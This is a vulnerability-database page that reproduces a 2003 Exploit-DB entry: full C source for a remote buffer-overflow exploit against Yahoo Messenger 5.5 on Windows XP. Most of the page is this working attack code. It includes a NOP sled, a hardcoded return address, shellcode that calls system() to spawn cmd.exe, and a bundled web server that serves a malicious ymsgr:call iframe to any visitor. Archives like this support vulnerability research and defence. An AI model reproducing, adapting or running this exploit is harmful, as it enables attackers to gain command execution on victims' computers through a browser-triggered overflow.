Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow

🗓️ 23 Jun 2003 00:00:00Reported by RaveType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 44 Views

Yahoo Messenger 5.5 remote overflow exploit allows execution of command shell on Windows XP.

Code
/* 
*
* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
*
* Dtors Security Research (DSR)
* Code by: Rave
*
* The buffer looks like this
*
* |-<-<-<--|
* <Fillup x offset><JMP 0x3><EIP><NOPS><SHELLCODE>
* ^__________^ 
*
*
*/


#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h> /* These are the usual header files */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#define MAXDATASIZE 555 /* Max number of bytes of data */
#define BACKLOG 200 /* Number of allowed connections */

static int port =80;

/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
char sraddress[8]="\x16\xd8\xE8\x77";

/* This shellcode just executes cmd.exe nothing special here..
* the victim gets a cmd shell on his desktop :) lol ! \
*/

unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"

"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()



static int port;
void Usage(char *programName)
{
printf("\n\t\t---------------------------------------------------\n");
printf("\t\t\t\tDtors Security Research (DSR) \n");
printf("\t\t\t\tCode by: Rave\n");
printf("\t\t\t\tMail: [email protected]\n");
printf("\t\t---------------------------------------------------\n\n");


/* Modify here to add your usage message when the program is
* called without arguments */
printf("\t\t---------------------------------------------------\n\n");
fprintf(stdout,"\t\t-P local webserver server portnumber\n");
fprintf(stdout,"\t\t-g greatz to:\n\n\n\n\n");
printf("\t\t---------------------------------------------------\n\n");

}

/* returns the index of the first argument that is not an option; i.e.
does not start with a dash or a slash
*/
int HandleOptions(int argc,char *argv[])
{
int i,firstnonoption=0;

for (i=1; i< argc;i++) {
if (argv[i][0] == '/' || argv[i][0] == '-') {
switch (argv[i][1]) {
/* An argument -? means help is requested */
case '?':
Usage(argv[0]);
break;
case 'P':
port=atoi(argv[i+1]);break;
case 'H':
if (!stricmp(argv[i]+1,"help")) {
Usage(argv[0]);
break;
}
/* If the option -h means anything else
* in your application add code here
* Note: this falls through to the default
* to print an "unknow option" message
*/
/* add your option switches here */
default:
fprintf(stderr,"unknown option %s\n",argv[i]);
break;
}
}
else {
firstnonoption = i;
break;
}
}
return firstnonoption;
}

int main(int argc,char *argv[])
{
FILE *fptr;
unsigned char buffer[5000];
int offset=320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction pointer change)
int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */

char sd[MAXDATASIZE]; /* sd will store send text */

struct sockaddr_in server; /* server's address information */
struct sockaddr_in client; /* client's address information */
struct hostent *he; /* pointer for the host entry */


WSADATA wsdata;
WSAStartup(0x0101,&wsdata);


if (argc == 1) {
/* If no arguments we call the Usage routine and exit */
Usage(argv[0]);
return 1;
}

HandleOptions(argc,argv);
fprintf(stdout,"Creating index.html: ");
if ((fptr =fopen("index.html","w"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}

// memseting the buffers for preperation
memset(sd,0x00,MAXDATASIZE);
memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);


// whe place the a jmp ebp+0x3 instuction inside the buffer
// to jump over the eip changing bytes at the en offset
//
// <fillup x offset>jmp 0x3<eip><NOPS><shellcode>
// |____________^
buffer[offset-4]=0xeb;
buffer[offset-3]=0x03;

memcpy(buffer+offset,sraddress,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode));


// here whe make the index.html
// whe open it again if some one connects to the exploiting server
// and send it over to the victim.

fprintf(fptr,"<!DOCTYPE HTML PUBLIC %c-//W3C//DTD HTML 4.0 Transitional//EN%c>",0x22,0x22);
fprintf(fptr,"<html>");
fprintf(fptr,"<title>Oohhh my god exploited</title>\n");
fprintf(fptr,"<body bgcolor=%cblack%c>",0x22,0x22);
fprintf(fptr,"<body>");
fprintf(fptr,"<font color=%c#C0C0C0%c size=%c2%c face=%cverdana, arial, helvetica, sans-serif%c>",
0x22,0x22,0x22,0x22,0x22,0x22);
fprintf(fptr,"<B>Dtors Security Research (DSR)</B>\n");
fprintf(fptr,"<p>Yah000 Messager Version 5.5 exploit....</p>\n");
fprintf(fptr,"<pre>");
fprintf(fptr,"<IFRAME SRC=%cymsgr:call?%s%c>Contach heaven</html></body>\x00\x00\x00",0x22,buffer,0x22);
fprintf(fptr,"<IFRAME SRC=%chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c>....</html>
</body>\x00\x00\x00",0x22,0x22);

fclose(fptr); // <-- closing index.html again


// Some extra debuging information
fprintf(stdout,"Using port: %d\n",port);
fprintf(stdout,"\nStarting server http://localhost:%d: ",port);

if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */
printf("socket() error\n");
exit(1);} else {
fprintf(stderr,"Done\n");
}


server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */
memset(server.sin_zero,0,8); /* zero the rest of the structure*/


if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){
/* calls bind() */
printf("bind() error\n");
exit(-1);
}

if(listen(fd,BACKLOG) == -1){ /* calls listen() */
printf("listen() error\n");
exit(-1);
}

while(1){
sin_size=sizeof(struct sockaddr_in);
if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){
/* calls accept() */
printf("accept() error\n");
exit(1);
}

if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==NULL){
printf("gethostbyname() error\n");
exit(-1);
}

printf("You got a connection from %s (%s)\n",
inet_ntoa(client.sin_addr),he->h_name);
/* prints client's IP */


fprintf(stdout,"\nOpening index.html for remote user: ");
if ((fptr =fopen("index.html","r"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}

fprintf(stdout,"Sending the overflow string... ");


// reading the index.html file and sending its
// contents to the connected victim

while (!feof(fptr)) {
send(fd2,sd,strlen(sd),0);
numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr);
sd[numbytes * sizeof(char)]='\0';


}


send(fd2,sd,strlen(sd),0);


printf("\n\n\nExploit Done....\n\n\n");
printf("A shell is started @ %s :) lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr),he->h_name);

gets(sd);
exit(0);
}

return 0;
}


// milw0rm.com [2003-06-23]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Jun 2003 00:00Current
7.4High risk
Vulners AI Score7.4
yahoo messengerremote overflowcommand shellwindows xpbuffer overflowsecurity vulnerability.
44